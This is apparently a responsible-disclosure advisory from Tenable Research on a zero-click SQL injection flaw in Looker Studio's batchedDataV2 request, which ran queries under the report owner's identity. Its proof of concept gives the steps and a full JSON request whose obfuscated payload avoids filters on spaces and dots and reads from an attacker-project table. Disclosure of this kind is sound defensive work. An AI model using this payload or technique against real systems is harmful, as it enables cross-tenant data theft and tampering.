Google Cloud Platform (GCP) Zero-Click Cross-Tenant SQL Injection Vulnerability on Big Query in Looker Studio

Tenable Research has identified and responsibly disclosed a severe SQL injection vulnerability in Looker Studio. The vulnerability could have allowed an attacker with only view-level access to create a report to execute arbitrary SQL queries on behalf of the report's owner.

The issue stemmed from improper sanitization of user-controlled input within the batchedDataV2 HTTP request. When a user accessed a Looker Studio report, dynamically generated column aliases in the request were directly injected into the underlying BigQuery or potentially Spanner queries. An attacker could manipulate these aliases to inject SQL commands.

By carefully crafting a malicious request, an attacker could bypass limitations such as the removal of dots and spaces. This enabled them to execute arbitrary queries under the report owner's identity, potentially leading to data exfiltration, modification, or deletion of any data the owner had access to.
 

Proof of Concept

1. Visit the victim’s report
2. Proxy the requests and catch the batchedDataV2 request
3. Inject SQL inside the JSON values and send the request.

{
  "dataRequest": [
    {
      "requestContext": {
        "reportContext": {
          "reportId": "8aa098ec-7c4b-44fa-b318-bd2ce6ab2264",
          "pageId": "76752849",
          "mode": 1,
          "componentId": "cd-0gl8hxqwsd",
          "displayType": "simple-table"
        },
        "requestMode": 0
      },
      "datasetSpec": {
        "dataset": [
          {
            "datasourceId": "b911a53d-621f-4ff2-ae31-63a31ab3a94f",
            "revisionNumber": 0,
            "parameterOverrides": []
          }
        ],
        "queryFields": [
          {
            "name": "qt_mcriqerwsda",
            "datasetNs": "d0",
            "tableNs": "t0",
            "dataTransformation": {
              "sourceFieldName": "_name_"
            }
          },
          {
            "name": "qt_1spiqerwsd_injection_starts_here/**/FROM/**/UNNEST([STRUCT('a'/**/AS/**/clmn0_)])/**/GROUP/**/BY/**/1;BEGIN/**/DECLARE/**/dot/**/STRING;DECLARE/**/table_name2/**/STRING;DECLARE/**/sql_query1/**/STRING;DECLARE/**/sql_query2/**/STRING;DECLARE/**/sql_query3/**/STRING;SET/**/dot/**/=/**/CHR(46);SET/**/table_name2/**/=/**/CONCAT(attacker-project',/**/dot,/**/'mydataset',/**/dot,/**/'exfila');SET/**/sql_query2/**/=/**/CONCAT('SELECT/**/*/**/FROM/**/`',/**/table_name2,/**/'`');EXECUTE/**/IMMEDIATE/**/sql_query2;END;SELECT/**/NULL/**/AS/**/t0_qt_1spiqerwsd",
            "datasetNs": "d0",
            "tableNs": "t0",
            "dataTransformation": {
              "sourceFieldName": "datastudio_record_count_system_field_id_98323387"
            }
          }
        ],
        "sortData": [
          {
            "sortColumn": {
              "name": "qt_1spiqerwsd",
              "datasetNs": "d0",
              "tableNs": "t0",
              "dataTransformation": {
                "sourceFieldName": "datastudio_record_count_system_field_id_98323387"
              }
            },
            "sortDir": 1
          }
        ],
        "includeRowsCount": true,
        "relatedDimensionMask": {
          "addDisplay": false,
          "addUniqueId": false,
          "addLatLong": false
        },
        "paginateInfo": {
          "startRow": 1,
          "rowsCount": 100
        },
        "dsFilterOverrides": [],
        "filters": [],
        "features": [],
        "dateRanges": [],
        "contextNsCount": 1,
        "calculatedField": [],
        "needGeocoding": false,
        "geoFieldMask": [],
        "multipleGeocodeFields": [],
        "timezone": "Asia/Jerusalem"
      },
      "role": "main",
      "retryHints": {
        "useClientControlledRetry": true,
        "isLastRetry": false,
        "retryCount": 0,
        "originalRequestId": "cd-0gl8hxqwsd_0_0"
      }
    }
  ]
}

4. Refresh the victim’s report. 
5. SQL runs on the victim's data.